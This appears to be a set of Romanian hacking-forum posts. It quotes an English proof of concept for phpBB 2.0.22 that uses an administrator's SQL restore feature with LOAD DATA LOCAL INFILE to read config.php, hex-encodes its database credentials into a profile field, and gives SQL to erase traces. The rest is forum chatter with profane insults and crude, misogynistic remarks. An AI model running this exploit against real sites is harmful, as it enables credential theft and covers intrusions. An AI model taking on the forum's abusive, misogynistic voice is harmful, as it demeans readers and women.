Kekkei

Orice keylogger/trojan/binder de ii public nu are sanse sa reziste mai mult de 2 zile nedetectabil !

## phpBB <= 2.0.22 Remote Database Authentication Details POC ## ## This text will show you how to get the content of the file ## config.php with the 'LOCAL INFILE' SQL command. You can also ## do it with 'LOAD_FILE' but you'll need file privileges, that's ## not interesting. To do it, you'll need Administrator rights ## (we'll use admin_db_utilities.php) and local_infile=ON ## (you don't need file privileges, that's why it's quite cool). ## PHP scripts should not permit the user to execute SQL commands. ## ## 1 Go to http://<victim>/login.php?redirect=admin/index.php&admin=1 ## 2 Log in as Administrator ## ## 3 Go to http://<victim>/admin/admin_styles.php?mode[]=create&sid=<sid> ## 4 You'll get a full path disclosure, note it somewhere ## ## 5 Go to http://<victim>/admin/admin_db_utilities.php?perform=backup&sid=<sid> ## 6 Choose "Structure-Only backup" then click on "Start Backup" ## 7 Now open the file and search the table prefix, note it ## ## 8 Go to http://<victim>/admin/admin_db_utilities.php?perform=restore&sid=<sid> ## 9 Create a file which have this content [replace <phpbb_fullpath>,<user>,<prefix>]: ## /*----------------------------------------------------------------------*/ ## CREATE TABLE tmp_hack(content text, email text, viewemail text); ## LOAD DATA LOCAL INFILE '<phpbb_fullpath>config.php' INTO TABLE tmp_hack FIELDS ## TERMINATED BY '__eof__' ESCAPED BY '' LINES TERMINATED BY '__eof__'; ## UPDATE tmp_hack SET viewemail=(SELECT user_viewemail FROM <prefix>users WHERE ## username='<user>'), email=(SELECT user_email FROM <prefix>users WHERE username='<user>'); ## UPDATE <prefix>users SET user_viewemail=0, user_email= ## CONCAT('"> <span class="gen">Encoded content</span> <input', ## UNHEX(20),'type="text" value="', ## (SELECT HEX(content) FROM tmp_hack),'"></input><input type="hidden') ## WHERE username='<user>'; ## /*----------------------------------------------------------------------*/ ## 10 Choose the file then click on "Start Restore" ## ## 11 Go to http://<victim>/profile.php?mode=editprofile, get the encoded content ## 12 This is the encoded content of the file config.php, use the pack() function to decode it ## 13 For example, with php, type this in your shell: php -r print(pack('H*','<encoded_file>')); ## 14 Note that I encoded the file content because this can produce an SQL error (e.g. login.php) ## ## 15 If you want to clear traces, execute this SQL file [replace <prefix>,<user>]: ## /*----------------------------------------------------------------------*/ ## UPDATE <prefix>users SET user_viewemail=(SELECT viewemail FROM tmp_hack), ## user_email=(SELECT email FROM tmp_hack) WHERE username='<user>'; ## DROP TABLE tmp_hack; ## /*----------------------------------------------------------------------*/ ## ## by DarkFig <gmdarkfig (at) gmail (dot) com> ## http://acid-root.new.fr/ ## #acidroot@irc.worldnet.net

Alt site de securitate romanesc nu mai e, poate de programare.[ si nu ar trebuii sa te bucure asta ] RST - Security Research ... security research ? pai din ce vad eu zilnic se fac posturi care au o minima legatura cu securitatea, nicidecum noi metode si tehnici si vulnerabilitati si exploituri facute de echipa RST.Daca stau bine sa ma gandesc in ultima vreme in afara de metoda lui Nemessis nu a mai fost postat nimic aici care sa dovedeasca ca RST ii comunitate de securitate. Scuza-ma , insa de cand ShowOFF a devenit vizibila doar staffului RST nu prea a mai avut legatura cu securitatea ci a devenit mai degraba un "forum al chat`ului" ci nu o comunitate de securitate. Tw8 : tutoriale ar putea sa faca oricine , dar ce rost ar avea sa stai 2-3 ore pe google sa te documentezi despre ceva iar apoi sa faci un tutorial.Acum sa fim seriosi nu are rost sa ne apucam sa mutam tutorialele de pe google pe RST si cele din carti pentru ca nu ar ajuta la nimic. Oricum , indiferent de ce se va intampla nu voi uita niciodata de RST unde am petrecut 17 luni si ceva + mi-a facut "legatura" cu cea de-a doua lume din spatele monitorului. Daca tot m-am apucat sa critic starea forumului din momentul de fata, am sa imi exprim si parerea [ cum as vrea eu sa fie RST ] 1.Curatirea forumului de userii cu 0 posturi si de cei care posteaza numai la ajutor&offtopic. 2.Formarea unei echipe RST astfel : - un membru sa se ocupe cu codarea exploiturilor - un membru sa se ocupe de descoperirea bugurilor in softuri - un membru sa se ocupe de codarea de aplicatii pentru atac - un membru care sa se ocupe cu cautarea de noi tehnici de atac - un membru care sa se ocupe de pentestingul unor siteuri/servere importante - un membru care sa se ocupe numai cu rezolvarea eventualelor probleme descoperite de catre un alt membru al Team`ului in timpul pentestingului. 3.Un proiect RST prin care sa se lanseze un CMS/Shopping Cart open source. 4.Punerea in practica a celor 3 puncte de mai sus.

Oare RST isi va revenii vreodata ? Pe zi ce trece activitatea devine tot mai moarta , tot mai multe posturi/tutoriale copy&paste , tot mai multe offtopicuri , in concluzie o multime de posturi inutile. Unde sunt vechii membri, unde este Fatal1ty,Icarius,avkhackteam,escalation666,mozi,MadBadSad,PsYKid, darkking,DarkWizzard,virusss,djradu,MiniDisc,k0ltzu,Encoded,SpiridusuCaddy ... nimeni nu mai pare interesat,nimeni nu mai posteaza nimic interesat, totul incepe sa se acopere cu panza de paianjen. Multi s-au retras,pe multi nu ii mai intereseaza insa RST incotro merge ? Mai are RST vreo sansa de scapare sau in curand se va inchide proiectul si totul va ramane amintire .. de ce toti nemernicii care vin pe forum posteaza numai balarii la Programe H4ck si tot felul de rahaturi luate de pe alte forumuri. Unde sunt vremurile cand pe RST erau 100 de useri online si toti se implicau,ajutau,postau lucruri interesante ... de ce trebuie sa suportam in prezent pe fiecare retardat care posteaza kkturi la Programe H4ck si la celelate topicuri

Prietene tie iti place sa mananci cacat cu polonicu` ? Chiar nu te vezi ca mirosi , cum plm iti permiti sa zbieri si sa iei pe restul userilor la pula ca fac offtopic si ca alea alea cand tu esti vai de pula ta, personal ti am citit doar cele 60 de posturi si ghici ce am observat NICI UNU NU E FOLOSITOR .Forumu` nu te dezolva si nimeni nu te poate dezvolta in afara de tine insuti + de cand cu open source si cu snippet`urile de pe google s-a infintat si Zero[gay]Hack.Lasa argoganta asta de pe tine si priveste lumea , nu incepe cu texte "ajutati forumu" si balarii

Nu ii zi in care h4cky0u sa nu fie spart de careva .. o fost de atateori spart incat mi sila de el.

1.Lasa SCOALA ca nu te ajuta cu absolut nimic , 99 % e inutil sa ai media 9 sau 10 , invata doar pentru a nu repeta degeaba anul si a avea acolo o medie de 5. 2.Scopul femeilor/fetelor : sa faca banii sa dispara in fiecare seara ! n-ai bani, n-ai nici pizda buna sa`ti stea la casa. 3.Invata sa iti traiesti viata ca nu esti NEMURITOR ! baga chefuri,pizde,alcool,combinatii. 4."viata sociala" , pai normal ca ii naspa viata cand esti treaz si vezi cum merg lucrurile in Romania , da dupa 1-2-3 baterii or beri sa vezi ce frumoase devin lucrurile

In concluzie si prin urmare iar esti beat ! cu cine ma mai injur eu in maghiara daca pleaca Flama,SharinGod,Nikidudero,Kadaj

Crazy Loop (Mm ma ma) presimt ca o sa fie hit mare !